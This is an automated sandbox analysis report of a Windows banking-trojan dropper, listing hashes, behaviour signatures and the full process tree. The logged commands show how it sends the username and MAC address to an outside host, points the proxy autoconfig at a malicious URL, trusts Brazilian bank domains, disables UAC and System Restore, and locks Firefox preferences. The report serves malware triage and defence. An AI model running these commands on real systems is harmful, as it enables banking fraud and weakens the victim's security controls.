Analysis

  • max time kernel
    149s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/10/2022, 12:07

General

  • Target

    343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe

  • Size

    184KB

  • MD5

    6c8c6428a07b5025cb783c587628204f

  • SHA1

    a8e82a79eb3de85ebc2ed80b0e9734064d5046ea

  • SHA256

    343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1

  • SHA512

    111c579c3fbf919c8a015f6d3a93d42c48aa2304734c8f9cff9ca85380585cbb4538475c8cadeb300726389fc26657e93d4a650ec4b7be349c22bfa2bbaf2cc6

  • SSDEEP

    3072:uPRuJo0o/OooObMZa9QtUURb8wyGX9cvp7oNnsB2cKzsUbkWLnCe:uPRuC9OooOZQuURYjGuvS3IMT

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe
    "C:\Users\Admin\AppData\Local\Temp\343f9caaad387f177fa88d8a220054c333c7b42e8994a5aefc683adf984601d1.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4512
    • C:\Users\Admin\AppData\Local\Temp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:664
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\664MEKM5.bat" "C:\Users\Admin\AppData\Local\Temp\Setup.exe" "
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4540
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c getmac | C:\Windows\system32\find.exe "Device"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1080
          • C:\Windows\SysWOW64\getmac.exe
            getmac
            5⤵
              PID:116
            • C:\Windows\SysWOW64\find.exe
              C:\Windows\system32\find.exe "Device"
              5⤵
                PID:224
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" "http://ads.fastentrega.com/ok.php?a=Admin&b=TMKNGOMU&c=E6-2D-9F-D3-CB-0B"
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3776
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3776 CREDAT:17410 /prefetch:2
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1884
            • C:\Windows\SysWOW64\fsutil.exe
              fsutil file createnew "C:\Users\Admin\AppData\Local\Temp\thum.db" 666"
              4⤵
                PID:4040
              • C:\Windows\SysWOW64\reg.exe
                C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~x
                4⤵
                  PID:864
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~x "
                  4⤵
                    PID:3284
                  • C:\Windows\SysWOW64\find.exe
                    C:\Windows\system32\find.exe "Internet Explorer\Main"
                    4⤵
                      PID:2824
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~y | C:\Windows\system32\find.exe "S-1-5-21"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2832
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~y "
                        5⤵
                          PID:4088
                        • C:\Windows\SysWOW64\find.exe
                          C:\Windows\system32\find.exe "S-1-5-21"
                          5⤵
                            PID:4084
                        • C:\Windows\SysWOW64\reg.exe
                          C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
                          4⤵
                            PID:4924
                          • C:\Windows\SysWOW64\reg.exe
                            C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
                            4⤵
                              PID:1624
                            • C:\Windows\SysWOW64\reg.exe
                              C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
                              4⤵
                                PID:1040
                              • C:\Windows\SysWOW64\reg.exe
                                C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.bb" /v "http" /t REG_DWORD /d "0x00000002" /f
                                4⤵
                                  PID:1888
                                • C:\Windows\SysWOW64\reg.exe
                                  C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.itau" /v "http" /t REG_DWORD /d "0x00000002" /f
                                  4⤵
                                    PID:2848
                                  • C:\Windows\SysWOW64\reg.exe
                                    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.hsbc" /v "http" /t REG_DWORD /d "0x00000002" /f
                                    4⤵
                                      PID:4196
                                    • C:\Windows\SysWOW64\reg.exe
                                      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.bradesco" /v "http" /t REG_DWORD /d "0x00000002" /f
                                      4⤵
                                        PID:4312
                                      • C:\Windows\SysWOW64\reg.exe
                                        C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\com.br\*.santander" /v "http" /t REG_DWORD /d "0x00000002" /f
                                        4⤵
                                          PID:2204
                                        • C:\Windows\SysWOW64\ipconfig.exe
                                          ipconfig /flushdns
                                          4⤵
                                          • Gathers network information
                                          PID:4276
                                        • C:\Windows\SysWOW64\reg.exe
                                          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "http://feliz.sejabemvindo2013.com.br/" /f
                                          4⤵
                                            PID:3840
                                          • C:\Windows\SysWOW64\reg.exe
                                            C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
                                            4⤵
                                              PID:4600
                                            • C:\Windows\SysWOW64\reg.exe
                                              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
                                              4⤵
                                                PID:2492
                                              • C:\Windows\SysWOW64\reg.exe
                                                C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
                                                4⤵
                                                  PID:3456
                                                • C:\Windows\SysWOW64\reg.exe
                                                  C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
                                                  4⤵
                                                    PID:1404
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
                                                    4⤵
                                                      PID:3116
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
                                                      4⤵
                                                        PID:4492
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "http://feliz.sejabemvindo2013.com.br/" /f
                                                        4⤵
                                                          PID:2592
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
                                                          4⤵
                                                            PID:2468
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
                                                            4⤵
                                                              PID:856
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
                                                              4⤵
                                                                PID:4748
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "Autoconfig" /t reg_dword /d 00000001 /f
                                                                4⤵
                                                                  PID:4228
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AdvancedTab" /t reg_dword /d 00000001 /f
                                                                  4⤵
                                                                    PID:4360
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
                                                                    4⤵
                                                                      PID:1816
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                                      4⤵
                                                                      • UAC bypass
                                                                      PID:3524
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
                                                                      4⤵
                                                                        PID:4476
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js"
                                                                        4⤵
                                                                        • Views/modifies file attributes
                                                                        PID:3696
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        C:\Windows\system32\attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js"
                                                                        4⤵
                                                                        • Views/modifies file attributes
                                                                        PID:4992

                                                                Network

                                                                      MITRE ATT&CK Enterprise v6

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

                                                                        Filesize

                                                                        471B

                                                                        MD5

                                                                        046bedf3b97e782edc5343dc24a1c485

                                                                        SHA1

                                                                        ebad04906d01fdb00719463e729f201a043433ae

                                                                        SHA256

                                                                        4bb13178dccf62921053ef1b62f9bdb994dfd0520741873a60ac2c1484df78ca

                                                                        SHA512

                                                                        18203014488892166d7c331f8239c1c030fd9831b8040d51b3fdf3d887f867380ff639ccac26e8751b7b13d1dc83e2931f96019783695e7a93c4348046c9fabf

                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

                                                                        Filesize

                                                                        404B

                                                                        MD5

                                                                        017b7bfd6ff50fd8ca1684af52df108f

                                                                        SHA1

                                                                        0c7d31770376c68affb5542444943deb8276a721

                                                                        SHA256

                                                                        452c455b4e35575d7c4dc506070914cd5c9676e6bf2cfa5fce32830dfdf77eb6

                                                                        SHA512

                                                                        b0a8f1abdb003db1413705648e5fc6c3cca546a6a9cc36c170f5d3fb0b64633fa89d0ce720d374e4e2fb675d041cfbe39f9bb66e21d54d7ef5f48b069f0fc7a3

                                                                      • C:\Users\Admin\AppData\Local\Temp\664MEKM5.bat

                                                                        Filesize

                                                                        5KB

                                                                        MD5

                                                                        0abf1d3702f4ea8adb195f4b87120d40

                                                                        SHA1

                                                                        0e42d7fcd9bb3ab72a95aa136f51a19c867bc024

                                                                        SHA256

                                                                        015e1527af15a705081ec987071a957a0453978b57cf53d9c8f396b969be126a

                                                                        SHA512

                                                                        31d1a871744c221cb6e081cf6ce958058b53835d1d957d3dc37299cccbf9f0c95160760f6bcc7ebce1b76d2a6bb61d5a167cb8943c7bd1b93e08cc6d68eedf65

                                                                      • C:\Users\Admin\AppData\Local\Temp\Setup.exe

                                                                        Filesize

                                                                        149KB

                                                                        MD5

                                                                        6a073b16b524deca92228174d711a6c0

                                                                        SHA1

                                                                        b248face191a754602d506d3d1d4136ea51c6e6f

                                                                        SHA256

                                                                        ff563660601ea093b0f143811f19fa7321f035df329d834d9f2f8b7062bfaf8e

                                                                        SHA512

                                                                        74e51758399ffd8dbf3360ebe747cc99e6a2577fb30580b1861305965c09a04a150ce0cb6b8fb64c3ac8ef7071fdc64eea5b4e203daaed83cc04235eaed226d2

                                                                      • C:\Users\Admin\AppData\Local\Temp\Setup.exe

                                                                        Filesize

                                                                        149KB

                                                                        MD5

                                                                        6a073b16b524deca92228174d711a6c0

                                                                        SHA1

                                                                        b248face191a754602d506d3d1d4136ea51c6e6f

                                                                        SHA256

                                                                        ff563660601ea093b0f143811f19fa7321f035df329d834d9f2f8b7062bfaf8e

                                                                        SHA512

                                                                        74e51758399ffd8dbf3360ebe747cc99e6a2577fb30580b1861305965c09a04a150ce0cb6b8fb64c3ac8ef7071fdc64eea5b4e203daaed83cc04235eaed226d2

                                                                      • C:\Users\Admin\AppData\Local\Temp\~x

                                                                        Filesize

                                                                        12.6MB

                                                                        MD5

                                                                        56c0aecd3f0d6fa6f63869a0fdb94ff0

                                                                        SHA1

                                                                        1d6e32157ecc5bd970815b5decce075f983832da

                                                                        SHA256

                                                                        1b9f05d8e8112439addc1cd38a7f48e3a739eae65959e1f2e2243c1fe047fc03

                                                                        SHA512

                                                                        0785f3a91716ad2b3e8bae8ebf245d6c201a44552ea34f9d5e1b63e7ae48f92a141b56094ba4a0900db54c5d860b34f70649e8b53f2d5f07b66f8ff1efa87b4e

                                                                      • C:\Users\Admin\AppData\Local\Temp\~y

                                                                        Filesize

                                                                        742B

                                                                        MD5

                                                                        b7740d2b8a6f07b92ff3b3aad8bfc043

                                                                        SHA1

                                                                        3de95410776924e7afc25b23cadde40c46eabecf

                                                                        SHA256

                                                                        dcc2249e28c2565fd17bf72a156aaf3ceb4cf701dbc57193d9fc7e8490a38e31

                                                                        SHA512

                                                                        fc6612ad4eaf8fcc8aa808012080c28ff26a281f12f9c861866eda5f3479db0ebfe2058882522c0ef439caa071904dfd20417580d20d2d9189ac5b8ee9a05a1b

                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js

                                                                        Filesize

                                                                        122B

                                                                        MD5

                                                                        8bc3bd5c7f165afac22f5a4e8509d954

                                                                        SHA1

                                                                        f72c0d8ef285ce1efc0a815725f1e78b15dd080b

                                                                        SHA256

                                                                        fbe6a62ac8ac10b712f78ca4398d146f1706da757a7e7fcc3b979c18e3e86a8a

                                                                        SHA512

                                                                        64cece72828c121bba0e78418628a72a1f56e76c50d4fe5569b157039a3aca540937ab929cdc3a63964df0e91578a087740ca4768aa8074f13c95073bd40e771